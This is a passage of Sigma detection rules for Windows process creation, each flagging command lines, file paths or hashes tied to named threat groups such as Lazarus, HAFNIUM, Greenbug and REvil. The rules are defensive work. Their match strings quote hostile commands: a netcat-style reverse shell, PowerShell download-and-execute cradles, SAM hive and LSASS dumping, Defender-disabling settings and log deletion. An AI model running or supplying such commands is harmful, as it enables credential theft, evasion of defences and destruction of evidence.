  16.     ParentImage|endswith: '\sllauncher.exe'
  17.     Image|endswith: '\svchost.exe'
  18.   condition: selection
  19. falsepositives:
  20.   - Unknown
  21. level: critical
  22. tags:
  23.   - attack.defense_evasion
  24.   - attack.t1574.002

proc_creation_win_apt_empiremonkey.yml
  1. title: Empire Monkey
  2. id: 10152a7b-b566-438f-a33c-390b607d1c8d
  3. status: test
  4. description: Detects EmpireMonkey APT reported Activity
  5. author: Markus Neis
  6. references:
  7.   - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b
  8. date: 2019/04/02
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection_cutil:
  15.     CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll'
  16.     Image|endswith: '\cutil.exe'
  17.   selection_regsvr32:
  18.     CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll'
  19.     Description: 'Microsoft(C) Registerserver'
  20.   condition: 1 of selection*
  21. falsepositives:
  22.   - Very Unlikely
  23. level: critical
  24. tags:
  25.   - attack.defense_evasion
  26.   - attack.t1218.010

proc_creation_win_apt_equtiongroup_dll_u_load.yml
  1. title: Equation Group DLL_U Load
  2. id: d465d1d8-27a2-4cca-9621-a800f37cf72e
  3. status: test
  4. description: Detects a specific tool and export used by EquationGroup
  5. author: Florian Roth
  6. references:
  7.   - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
  8.   - https://securelist.com/apt-slingshot/84312/
  9.   - https://twitter.com/cyb3rops/status/972186477512839170
  10. date: 2019/03/04
  11. modified: 2021/11/27
  12. logsource:
  13.   category: process_creation
  14.   product: windows
  15. detection:
  16.   selection1:
  17.     Image|endswith: '\rundll32.exe'
  18.     CommandLine|endswith: ',dll_u'
  19.   selection2:
  20.     CommandLine|contains: ' -export dll_u '
  21.   condition: 1 of selection*
  22. falsepositives:
  23.   - Unknown
  24. level: critical
  25. tags:
  26.   - attack.g0020
  27.   - attack.defense_evasion
  28.   - attack.t1218.011

proc_creation_win_apt_evilnum_jul20.yml
  2. title: EvilNum Golden Chickens Deployment via OCX Files
  3. id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0
  4. status: test
  5. description: Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020
  6. author: Florian Roth
  7. references:
  8.   - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
  9.   - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
  10. date: 2020/07/10
  11. modified: 2021/11/27
  12. logsource:
  13.   category: process_creation
  14.   product: windows
  15. detection:
  16.   selection:
  17.     CommandLine|contains|all:
  18.       - 'regsvr32'
  19.       - '/s'
  20.       - '/i'
  21.       - '\AppData\Roaming\'
  22.       - '.ocx'
  23.   condition: selection
  24. falsepositives:
  25.   - Unknown
  26. level: critical
  27. tags:
  28.   - attack.defense_evasion
  29.   - attack.t1218.011

proc_creation_win_apt_gallium.yml
  1. title: GALLIUM Artefacts
  2. id: 18739897-21b1-41da-8ee4-5b786915a676
  3. related:
  4.     - id: 440a56bf-7873-4439-940a-1c8a671073c2
  5.       type: derived
  6. status: experimental
  7. description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  8. author: Tim Burrell
  9. date: 2020/02/07
  10. modified: 2021/09/19
  11. references:
  12.     - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
  13.     - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
  14. tags:
  15.     - attack.credential_access
  16.     - attack.t1212 
  17.     - attack.command_and_control
  18.     - attack.t1071
  19. logsource:
  20.     product: windows
  21.     category: process_creation
  22. detection:
  23.     legitimate_process_path:
  24.         Image|contains:
  25.             - ':\Program Files(x86)\'
  26.             - ':\Program Files\'
  27.     legitimate_executable:
  28.         sha1:
  29.             - 'e570585edc69f9074cb5e8a790708336bd45ca0f'
  30.     condition: legitimate_executable and not legitimate_process_path
  31. falsepositives:
  32.     - unknown
  33. level: high

proc_creation_win_apt_gallium_sha1.yml
  1. title: GALLIUM Artefacts
  2. id: 440a56bf-7873-4439-940a-1c8a671073c2
  3. status: experimental
  4. description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  5. author: Tim Burrell
  6. date: 2020/02/07
  7. modified: 2021/09/19
  8. references:
  9.     - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
  10.     - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
  11. tags:
  12.     - attack.credential_access
  13.     - attack.t1212 
  14.     - attack.command_and_control
  15.     - attack.t1071
  16. logsource:
  17.     product: windows
  18.     category: process_creation
  19. detection:
  20.     exec_selection:
  21.         sha1:
  22.             - '53a44c2396d15c3a03723fa5e5db54cafd527635'
  23.             - '9c5e496921e3bc882dc40694f1dcc3746a75db19'
  24.             - 'aeb573accfd95758550cf30bf04f389a92922844'
  25.             - '79ef78a797403a4ed1a616c68e07fff868a8650a'
  26.             - '4f6f38b4cec35e895d91c052b1f5a83d665c2196'
  27.             - '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d'
  28.             - 'e841a63e47361a572db9a7334af459ddca11347a'
  29.             - 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d'
  30.             - '2e94b305d6812a9f96e6781c888e48c7fb157b6b'
  31.             - 'dd44133716b8a241957b912fa6a02efde3ce3025'
  32.             - '8793bf166cb89eb55f0593404e4e933ab605e803'
  33.             - 'a39b57032dbb2335499a51e13470a7cd5d86b138'
  34.             - '41cc2b15c662bc001c0eb92f6cc222934f0beeea'
  35.             - 'd209430d6af54792371174e70e27dd11d3def7a7'
  36.             - '1c6452026c56efd2c94cea7e0f671eb55515edb0'
  37.             - 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a'
  38.             - '4923d460e22fbbf165bbbaba168e5a46b8157d9f'
  39.             - 'f201504bd96e81d0d350c3a8332593ee1c9e09de'
  40.             - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2'
  41.     condition: exec_selection
  42. falsepositives:
  43.     - unknown
  44. level: high

proc_creation_win_apt_greenbug_may20.yml
  1. title: Greenbug Campaign Indicators
  2. id: 3711eee4-a808-4849-8a14-faf733da3612
  3. status: experimental
  4. description: Detects tools and process executions as observed in a Greenbug campaign in May 2020
  5. references:
  6.     - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
  7. author: Florian Roth
  8. date: 2020/05/20
  9. modified: 2021/09/21
  10. tags:
  11.     - attack.g0049
  12.     - attack.execution
  13.     - attack.t1059.001
  14.     - attack.command_and_control
  15.     - attack.t1105
  16.     - attack.defense_evasion
  17.     - attack.t1036.005
  18. logsource:
  19.     category: process_creation
  20.     product: windows
  21. detection:
  22.     selection1:
  23.         CommandLine|contains|all: 
  24.             - 'bitsadmin'
  25.             - '/transfer'
  26.             - 'CSIDL_APPDATA'
  27.     selection2:
  28.         CommandLine|contains: 
  29.             - 'CSIDL_SYSTEM_DRIVE'
  30.     selection3: 
  31.         CommandLine|contains:
  32.             - '\msf.ps1'
  33.             - '8989 -e cmd.exe'
  34.             - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
  35.             - '-nop -w hidden -c $k=new-object'
  36.             - '[Net.CredentialCache]::DefaultCredentials;IEX '
  37.             - ' -nop -w hidden -c $m=new-object net.webclient;$m'
  38.             - '-noninteractive -executionpolicy bypass whoami'
  39.             - '-noninteractive -executionpolicy bypass netstat -a'
  40.             - 'L3NlcnZlcj1'  # base64 encoded '/server='
  41.     selection4:
  42.         Image|endswith:
  43.             - '\adobe\Adobe.exe'
  44.             - '\oracle\local.exe'
  45.             - '\revshell.exe'
  46.             - 'infopagesbackup\ncat.exe'
  47.             - 'CSIDL_SYSTEM\cmd.exe'
  48.             - '\programdata\oracle\java.exe'
  49.             - 'CSIDL_COMMON_APPDATA\comms\comms.exe'
  50.             - '\Programdata\VMware\Vmware.exe'
  51.     condition: 1 of selection*
  52. falsepositives:
  53.     - Unknown
  54. level: critical

proc_creation_win_apt_hafnium.yml
  1. title: Exchange Exploitation Activity
  2. id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
  3. description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
  4. author: Florian Roth
  5. date: 2021/03/09
  6. modified: 2021/03/16
  7. status: experimental
  8. references:
  9.     - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
  10.     - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
  11.     - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
  12.     - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
  13.     - https://twitter.com/BleepinComputer/status/1372218235949617161
  14. logsource:
  15.     category: process_creation
  16.     product: windows
  17. detection:
  18.     selection1:
  19.         CommandLine|contains|all:
  20.             - 'attrib'
  21.             - ' +h '
  22.             - ' +s '
  23.             - ' +r '
  24.             - '.aspx'
  25.     selection2:
  26.         CommandLine|contains|all:
  27.             - 'schtasks'
  28.             - 'VSPerfMon'
  29.     selection3:
  30.         CommandLine|contains|all:
  31.             - 'vssadmin list shadows'
  32.             - 'Temp\__output'
  33.     selection4: 
  34.         CommandLine|contains: '%TEMP%\execute.bat'
  35.     selection5:
  36.         Image|endswith: 'Users\Public\opera\Opera_browser.exe'
  37.     selection6:
  38.         Image|endswith: 'Opera_browser.exe'
  39.         ParentImage|endswith:
  40.             - '\services.exe'
  41.             - '\svchost.exe'
  42.     selection7:
  43.         Image|contains: '\ProgramData\VSPerfMon\'
  44.     selection8:
  45.         CommandLine|contains|all:
  46.             - ' -t7z '
  47.             - 'C:\Programdata\pst'
  48.             - '\it.zip'
  49.     selection9:
  50.         Image|endswith: '\makecab.exe'
  51.         CommandLine|contains:
  52.             - 'Microsoft\Exchange Server\'
  53.             - 'inetpub\wwwroot'
  54.     selection10:
  55.         CommandLine|contains: 
  56.             - '\Temp\xx.bat'
  57.             - 'Windows\WwanSvcdcs'
  58.             - 'Windows\Temp\cw.exe'
  59.     selection11: 
  60.         CommandLine|contains|all:
  61.             - '\comsvcs.dll'
  62.             - 'Minidump'
  63.             - '\inetpub\wwwroot'
  64.     selection12:
  65.         CommandLine|contains|all:
  66.             - 'dsquery'
  67.             - ' -uco '
  68.             - '\inetpub\wwwroot'
  69.     condition: 1 of selection*
  70. falsepositives:
  71.     - Unknown
  72. level: high
  73. tags:
  74.     - attack.persistence 
  75.     - attack.t1546
  76.     - attack.t1053

proc_creation_win_apt_hurricane_panda.yml
  1. title: Hurricane Panda Activity
  2. id: 0eb2107b-a596-422e-b123-b389d5594ed7
  3. status: test
  4. description: Detects Hurricane Panda Activity
  5. author: Florian Roth
  6. references:
  7.   - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
  8. date: 2019/03/04
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     - CommandLine|contains|all:
  16.       - 'localgroup'
  17.       - 'admin'
  18.       - '/add'
  19.     - CommandLine|contains:
  20.       - '\Win64.exe'
  21.   condition: selection
  22. falsepositives:
  23.   - Unknown
  24. level: high
  25. tags:
  26.   - attack.privilege_escalation
  27.   - attack.g0009
  28.   - attack.t1068

proc_creation_win_apt_judgement_panda_gtr19.yml
  1. title: Judgement Panda Exfil Activity
  2. id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
  3. status: test
  4. description: Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike
  5. author: Florian Roth
  6. references:
  7.   - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
  8. date: 2019/02/21
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection1:
  15.     - CommandLine|endswith: 'eprod.ldf'
  16.     - CommandLine|contains:
  17.       - '\ldifde.exe -f -n '
  18.       - '\7za.exe a 1.7z '
  19.       - '\aaaa\procdump64.exe'
  20.       - '\aaaa\netsess.exe'
  21.       - '\aaaa\7za.exe'
  22.       - 'copy .\1.7z \'
  23.       - 'copy \\client\c$\aaaa\'
  24.   selection2:
  25.     Image: C:\Users\Public\7za.exe
  26.   condition: selection1 or selection2
  27. falsepositives:
  28.   - unknown
  29. level: critical
  30. tags:
  31.   - attack.lateral_movement
  32.   - attack.g0010
  33.   - attack.credential_access
  34.   - attack.t1003.001
  35.   - attack.exfiltration
  36.   - attack.t1560.001

proc_creation_win_apt_ke3chang_regadd.yml
  1. title: Ke3chang Registry Key Modifications
  2. id: 7b544661-69fc-419f-9a59-82ccc328f205
  3. status: test
  4. description: Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020
  5. author: Markus Neis, Swisscom
  6. references:
  7.   - https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
  8.   - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
  9. date: 2020/06/18
  10. modified: 2021/11/27
  11. logsource:
  12.   category: process_creation
  13.   product: windows
  14. detection:
  15.   selection1:
  16.         # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. 
  17.         # Setting these registry keys is unique to the Ke3chang and TidePool malware families.
  18.         # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
  19.         # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
  20.         # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden
  21.     CommandLine|contains:
  22.       - '-Property DWORD -name DisableFirstRunCustomize -value 2 -Force'
  23.       - '-Property String -name Check_Associations -value'
  24.       - '-Property DWORD -name IEHarden -value 0 -Force'
  25.   condition: selection1
  26. falsepositives:
  27.   - Will need to be looked for combinations of those processes
  28. level: critical
  29. tags:
  30.   - attack.g0004
  31.   - attack.defense_evasion
  32.   - attack.t1562.001

proc_creation_wi_apt_lazarus_activity_apr21.yml
  1. title: Lazarus Activity
  2. id: 4a12fa47-c735-4032-a214-6fab5b120670
  3. description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
  4. status: experimental
  5. references:
  6.     - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
  7. tags:
  8.     - attack.g0032
  9.     - attack.execution
  10.     - attack.t1106 
  11. author: Bhabesh Raj
  12. date: 2021/04/20
  13. modified: 2021/06/27
  14. logsource:
  15.     category: process_creation
  16.     product: windows
  17. detection:
  18.     selection1:
  19.         CommandLine|contains|all:
  20.             - 'mshta'
  21.             - '.zip'
  22.     selection2:
  23.         ParentImage:
  24.             - 'C:\Windows\System32\wbem\wmiprvse.exe'
  25.         Image:
  26.             - 'C:\Windows\System32\mshta.exe'
  27.     selection3:
  28.         ParentImage|contains:
  29.             - ':\Users\Public\'
  30.         Image:
  31.             - 'C:\Windows\System32\rundll32.exe'
  32.     condition: 1 of selection*
  33. falsepositives:
  34.     - Should not be any false positives
  35. level: critical

proc_creation_win_apt_lazarus_activity_dec20.yml
  1. title: Lazarus Activity
  2. id: 24c4d154-05a4-4b99-b57d-9b977472443a
  3. description: Detects different process creation events as described in various threat reports on Lazarus group activity
  4. status: experimental
  5. references:
  6.     - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
  7.     - https://www.hvs-consulting.de/lazarus-report/
  8. tags:
  9.     - attack.g0032
  10.     - attack.execution
  11.     - attack.t1059 
  12. author: Florian Roth
  13. date: 2020/12/23
  14. modified: 2021/06/27
  15. logsource:
  16.     category: process_creation
  17.     product: windows
  18. detection:
  19.     selection1:
  20.         CommandLine|contains:
  21.             - 'reg.exe save hklm\sam %temp%\~reg_sam.save'
  22.             - '1q2w3e4r@#$@#$@#$'
  23.             - ' -hp1q2w3e4 '
  24.             - '.dat data03 10000 -p '
  25.     selection2:
  26.         CommandLine|contains|all:
  27.             - 'process call create'
  28.             - ' > %temp%\~'
  29.     selection3:
  30.         CommandLine|contains|all:
  31.             - 'netstat -aon | find '
  32.             - ' > %temp%\~'
  33.     # Network share discovery
  34.     selection4:
  35.         CommandLine|contains:
  36.             - '.255 10 C:\ProgramData\'
  37.     condition: 1 of selection*
  38. falsepositives:
  39.     - Overlap with legitimate process activity in some cases (especially selection 3 and 4)
  40. level: critical

proc_creation_win_apt_lazarus_loader.yml
  1. title: Lazarus Loaders
  2. id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
  3. description: Detects different loaders as described in various threat reports on Lazarus group activity
  4. status: experimental
  5. references:
  6.     - https://www.hvs-consulting.de/lazarus-report/
  7.     - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
  8. tags:
  9.     - attack.g0032
  10.     - attack.execution
  11.     - attack.t1059 
  12. author: Florian Roth, wagga
  13. date: 2020/12/23
  14. modified: 2021/06/27
  15. logsource:
  16.     category: process_creation
  17.     product: windows
  18. detection:
  19.     selection_cmd1:
  20.         CommandLine|contains|all: 
  21.             - 'cmd.exe /c '
  22.             - ' -p 0x'
  23.     selection_cmd2:
  24.         CommandLine|contains:
  25.             - 'C:\ProgramData\'
  26.             - 'C:\RECYCLER\'
  27.     selection_rundll1:
  28.         CommandLine|contains|all: 
  29.             - 'rundll32.exe '
  30.             - 'C:\ProgramData\'
  31.     selection_rundll2:
  32.         CommandLine|contains:
  33.             - '.bin,'
  34.             - '.tmp,'
  35.             - '.dat,'
  36.             - '.io,'
  37.             - '.ini,'
  38.             - '.db,'
  39.     condition: ( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )
  40. falsepositives:
  41.     - unknown
  42. level: critical

proc_creation_win_apt_lazarus_session_highjack.yml
  1. title: Lazarus Session Highjacker
  2. id: 3f7f5b0b-5b16-476c-a85f-ab477f6dd24b
  3. status: test
  4. description: Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)
  5. author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
  6. references:
  7.   - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
  8. date: 2020/06/03
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     Image|endswith:
  16.       - '\msdtc.exe'
  17.       - '\gpvc.exe'
  18.   filter:
  19.     Image|startswith:
  20.       - 'C:\Windows\System32\'
  21.       - 'C:\Windows\SysWOW64\'
  22.   condition: selection and not filter
  23. falsepositives:
  24.   - unknown
  25. level: high
  26. tags:
  27.   - attack.defense_evasion
  28.   - attack.t1036.005

proc_creation_win_apt_muddywater_dnstunnel.yml
  1. title: DNS Tunnel Technique from MuddyWater
  2. id: 36222790-0d43-4fe8-86e4-674b27809543
  3. status: test
  4. description: Detecting DNS tunnel activity for Muddywater actor
  5. author: '@caliskanfurkan_'
  6. references:
  7.   - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/
  8.   - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
  9. date: 2020/06/04
  10. modified: 2021/11/27
  11. logsource:
  12.   category: process_creation
  13.   product: windows
  14. detection:
  15.   selection:
  16.     Image|endswith:
  17.       - '\powershell.exe'
  18.     ParentImage|endswith:
  19.       - '\excel.exe'
  20.     CommandLine|contains:
  21.       - 'DataExchange.dll'
  22.   condition: selection
  23. falsepositives:
  24.   - Unknown
  25. level: critical
  26. tags:
  27.   - attack.command_and_control
  28.   - attack.t1071.004

proc_creation_win_apt_mustangpanda.yml
  1. title: Mustang Panda Dropper
  2. id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00
  3. status: test
  4. description: Detects specific process parameters as used by Mustang Panda droppers
  5. author: Florian Roth, oscd.community
  6. references:
  7.   - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/
  8.   - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/
  9.   - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
  10. date: 2019/10/30
  11. modified: 2021/11/27
  12. logsource:
  13.   category: process_creation
  14.   product: windows
  15. detection:
  16.   selection1:
  17.     - CommandLine|contains:
  18.       - 'Temp\wtask.exe /create'
  19.       - '%windir:~-3,1%%PUBLIC:~-9,1%'
  20.       - '/tn "Security Script '
  21.       - '%windir:~-1,1%'
  22.     - CommandLine|contains|all:
  23.       - '/E:vbscript'
  24.       - 'C:\Users\'
  25.       - '.txt'
  26.       - '/F'
  27.   selection2:
  28.     Image|endswith: 'Temp\winwsh.exe'
  29.   condition: 1 of selection*
  30. fields:
  31.   - CommandLine
  32.   - ParentCommandLine
  33. falsepositives:
  34.   - Unlikely
  35. level: high
  36. tags:
  37.   - attack.t1587.001
  38.   - attack.resource_development

proc_creation_win_apt_pandemic.yml
  1. title: Pandemic Registry Key
  2. id: 9fefd33c-339d-4495-9cba-b96ca006f512
  3. related:
  4.     - id: 47e0852a-cf81-4494-a8e6-31864f8c86ed
  5.       type: derived
  6. status: experimental
  7. description: Detects Pandemic Windows Implant
  8. references:
  9.     - https://wikileaks.org/vault7/#Pandemic
  10.     - https://twitter.com/MalwareJake/status/870349480356454401
  11. tags:
  12.     - attack.lateral_movement
  13.     - attack.t1105
  14. author: Florian Roth
  15. date: 2017/06/01
  16. modified: 2021/09/12
  17. logsource:
  18.     category: process_creation
  19.     product: windows
  20. detection:
  21.     selection:
  22.         CommandLine|contains: 'loaddll -a '
  23.     condition: selection
  24. falsepositives:
  25.     - unknown
  26. level: critical
  27. fields:
  28.     - EventID
  29.     - CommandLine
  30.     - ParentCommandLine
  31.     - Image
  32.     - User
  33.     - TargetObject

proc_creation_win_apt_revil_kaseya.yml
  1. title: REvil Kaseya Incident Malware Patterns
  2. id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5
  3. status: experimental
  4. description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
  5. references:
  6.     - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
  7.     - https://www.joesandbox.com/analysis/443736/0/html
  8.     - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
  9.     - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
  10.     - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
  11. author: Florian Roth
  12. date: 2021/07/03
  13. modified: 2022/02/28
  14. tags:
  15.     - attack.execution
  16.     - attack.t1059 
  17.     - attack.g0115
  18. logsource:
  19.     category: process_creation
  20.     product: windows
  21. detection:
  22.     selection1:
  23.         CommandLine|contains:
  24.             - 'C:\Windows\cert.exe'
  25.             - 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled'
  26.             - 'del /q /f c:\kworking\agent.crt'
  27.             - 'Kaseya VSA Agent Hot-fix'
  28.             - '\AppData\Local\Temp\MsMpEng.exe'
  29.             - 'rmdir /s /q %SystemDrive%\inetpub\logs'
  30.             - 'del /s /q /f %SystemDrive%\\*.log'
  31.             - 'c:\kworking1\agent.exe'
  32.             - 'c:\kworking1\agent.crt'
  33.     selection2:
  34.         Image: 
  35.             - 'C:\Windows\MsMpEng.exe'
  36.             - 'C:\Windows\cert.exe'
  37.             - 'C:\kworking\agent.exe'
  38.             - 'C:\kworking1\agent.exe'
  39.     selection3:
  40.         CommandLine|contains|all:
  41.             - 'del /s /q /f'
  42.             - 'WebPages\Errors\webErrorLog.txt'
  43.     condition: 1 of selection*
  44. falsepositives:
  45.     - Unknown
  46. level: critical

proc_creation_win_apt_slingshot.yml
  1. title: Defrag Deactivation
  2. id: 958d81aa-8566-4cea-a565-59ccd4df27b0
  3. description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
  4. status: experimental
  5. author: Florian Roth, Bartlomiej Czyz (@bczyz1)
  6. date: 2019/03/04
  7. modified: 2021/09/19
  8. references:
  9.     - https://securelist.com/apt-slingshot/84312/
  10. tags:
  11.     - attack.persistence
  12.     - attack.t1053.005
  13.     - attack.s0111
  14. logsource:
  15.     category: process_creation
  16.     product: windows
  17. detection:
  18.     selection:
  19.         Image|endswith: '\schtasks.exe'
  20.         CommandLine|contains:
  21.             - '/delete'
  22.             - '/change'
  23.         CommandLine|contains|all:
  24.             - '/TN'
  25.             - '\Microsoft\Windows\Defrag\ScheduledDefrag'
  26.     condition: selection
  27. falsepositives:
  28.     - Unknown
  29. level: medium

proc_creation_win_apt_sofacy.yml
  1. title: Sofacy Trojan Loader Activity
  2. id: ba778144-5e3d-40cf-8af9-e28fb1df1e20
  3. author: Florian Roth, Jonhnathan Ribeiro, oscd.community
  4. status: experimental
  5. date: 2018/03/01
  6. modified: 2021/12/08
  7. description: Detects Trojan loader acitivty as used by APT28
  8. references:
  9.     - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
  10.     - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
  11.     - https://twitter.com/ClearskySec/status/960924755355369472
  12. tags:
  13.     - attack.g0007
  14.     - attack.execution
  15.     - attack.t1059.003
  16.     - attack.defense_evasion
  17.     - car.2013-10-002
  18.     - attack.t1218.011
  19. logsource:
  20.     category: process_creation
  21.     product: windows
  22. detection:
  23.     selection1:
  24.         CommandLine|contains|all:
  25.             - 'rundll32.exe'
  26.             - '%APPDATA%\'
  27.     selection2:
  28.         - CommandLine|contains: '.dat",'
  29.         - CommandLine|endswith: 
  30.             - '.dll",#1'
  31.             - '.dll #1'
  32.             - '.dll" #1'
  33.     condition: selection1 and selection2
  34. falsepositives:
  35.     - Unknown
  36. level: critical

proc_creation_win_apt_sourgrum.yml
  1. title: SOURGUM Actor Behaviours
  2. id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd
  3. description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
  4. author: MSTIC, FPT.EagleEye
  5. status: experimental
  6. level: high
  7. references:
  8.     - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection
  9.     - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml
  10.     - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
  11. date: 2021/06/15
  12. modified: 2021/07/30
  13. tags:
  14.     - attack.t1546
  15.     - attack.t1546.015
  16.     - attack.persistence
  17.     - attack.privilege_escalation
  18. logsource:
  19.     product: windows
  20.     category: process_creation
  21. detection:
  22.     selection1:
  23.         Image|contains: 'windows\system32\Physmem.sys'
  24.     selection2:
  25.         Image|contains: 
  26.             - 'Windows\system32\ime\SHARED\WimBootConfigurations.ini'
  27.             - 'Windows\system32\ime\IMEJP\WimBootConfigurations.ini'
  28.             - 'Windows\system32\ime\IMETC\WimBootConfigurations.ini'
  29.     selection3:
  30.         Image|contains:
  31.             - 'windows\system32\filepath2'
  32.             - 'windows\system32\ime'
  33.     registry_command:
  34.         CommandLine|contains:
  35.             - 'reg add'
  36.     registry_key:
  37.         CommandLine|contains: 
  38.             - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32'
  39.             - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32'
  40.     condition: selection1 or selection2 or (selection3 and registry_command and registry_key)
  41. falsepositives:
  42.     - Unknown

proc_creation_win_apt_ta17_293a_ps.yml
  1. title: Ps.exe Renamed SysInternals Tool
  2. id: 18da1007-3f26-470f-875d-f77faf1cab31
  3. status: test
  4. description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
  5. author: Florian Roth
  6. references:
  7.   - https://www.us-cert.gov/ncas/alerts/TA17-293A
  8. date: 2017/10/22
  9. modified: 2021/11/27
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     CommandLine: 'ps.exe -accepteula'
  16.   condition: selection
  17. falsepositives:
  18.   - Renamed SysInternals tool
  19. level: high
  20. tags:
  21.   - attack.defense_evasion
  22.   - attack.g0035
  23.   - attack.t1036.003
  24.   - car.2013-05-009

proc_creation_win_apt_ta505_dropper.yml
  1. title: TA505 Dropper Load Pattern
  2. id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
  3. status: test
  4. description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
  5. author: Florian Roth
  6. references:
  7.   - https://twitter.com/ForensicITGuy/status/1334734244120309760
  8. date: 2020/12/08
  9. modified: 2022/01/07
  10. logsource:
  11.   category: process_creation
  12.   product: windows
  13. detection:
  14.   selection:
  15.     Image|endswith: '\mshta.exe'
  16.     ParentImage|endswith: '\wmiprvse.exe'
  17.   condition: selection
  18. falsepositives:
  19.   - unknown
  20. level: critical
  21. tags:
  22.   - attack.execution
